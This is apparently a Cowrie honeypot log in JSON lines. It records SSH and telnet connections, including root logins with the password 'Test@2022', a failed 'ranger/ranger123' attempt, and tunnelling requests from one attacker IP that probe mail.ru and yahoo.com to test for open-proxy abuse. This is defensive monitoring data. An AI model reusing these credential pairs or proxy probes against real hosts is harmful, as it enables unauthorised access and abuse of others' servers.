{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20954,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20954","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.012528Z","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.063801Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.187055Z","src_ip":"212.227.235.229","session":"e85542b54f8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7790,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7790","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.209417Z","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.260752Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":1475,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1475","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.406178Z","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.457568Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.509498Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15337,"dst_ip":"1.2.3.4","dst_port":22,"session":"573025fafb3d","protocol":"ssh","message":"New connection: 77.83.207.83:15337 (1.2.3.4:22) [session: 573025fafb3d]","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.557731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.567074Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.607717Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38800,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ec147866074","protocol":"ssh","message":"New connection: 212.227.125.160:38800 (1.2.3.4:22) [session: 8ec147866074]","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.638117Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.838065Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.839171Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.898569Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6968,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6968","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.949412Z","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:20.999914Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":23591,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23591","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.140143Z","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.190474Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5948,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5948","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.332059Z","session":"573025fafb3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.381927Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.432873Z","src_ip":"77.83.207.83","session":"573025fafb3d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15447,"dst_ip":"1.2.3.4","dst_port":22,"session":"c84704265501","protocol":"ssh","message":"New connection: 77.83.207.83:15447 (1.2.3.4:22) [session: c84704265501]","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.481834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.482778Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.532438Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.780584Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19404,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19404","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.831174Z","session":"c84704265501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.881054Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.session.closed","duration":12.791526079177856,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:21.959949Z","src_ip":"212.227.235.229","session":"7a6d1cbe86fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10391,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10391","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.024158Z","session":"c84704265501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.073971Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49897,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ed78da890db","protocol":"telnet","message":"New connection: 212.227.235.229:49897 (1.2.3.4:23) [session: 7ed78da890db]","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.179395Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":19922,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19922","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.216230Z","session":"c84704265501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.266281Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.317207Z","src_ip":"77.83.207.83","session":"c84704265501"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15545,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ffc5fdb954d","protocol":"ssh","message":"New connection: 77.83.207.83:15545 (1.2.3.4:22) [session: 7ffc5fdb954d]","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.365590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.375483Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.415274Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.661946Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21629,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21629","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.713078Z","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.762643Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27971,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27971","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.903780Z","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:22.953360Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":15221,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15221","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.095864Z","session":"7ffc5fdb954d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.145535Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.196331Z","src_ip":"77.83.207.83","session":"7ffc5fdb954d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15701,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1e1a94df5a1","protocol":"ssh","message":"New connection: 77.83.207.83:15701 (1.2.3.4:22) [session: b1e1a94df5a1]","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.245440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.255228Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.295633Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.544040Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29931,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29931","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.594956Z","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.645252Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":21958,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21958","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.788354Z","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.838285Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12138,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12138","sensor":"my-vps","timestamp":"2025-08-31T03:50:23.980323Z","session":"b1e1a94df5a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.030283Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.080985Z","src_ip":"77.83.207.83","session":"b1e1a94df5a1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15848,"dst_ip":"1.2.3.4","dst_port":22,"session":"02033fa38609","protocol":"ssh","message":"New connection: 77.83.207.83:15848 (1.2.3.4:22) [session: 02033fa38609]","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.131381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:24.141345Z","src_ip":"77.83.207.83","session":"02033fa38609"}
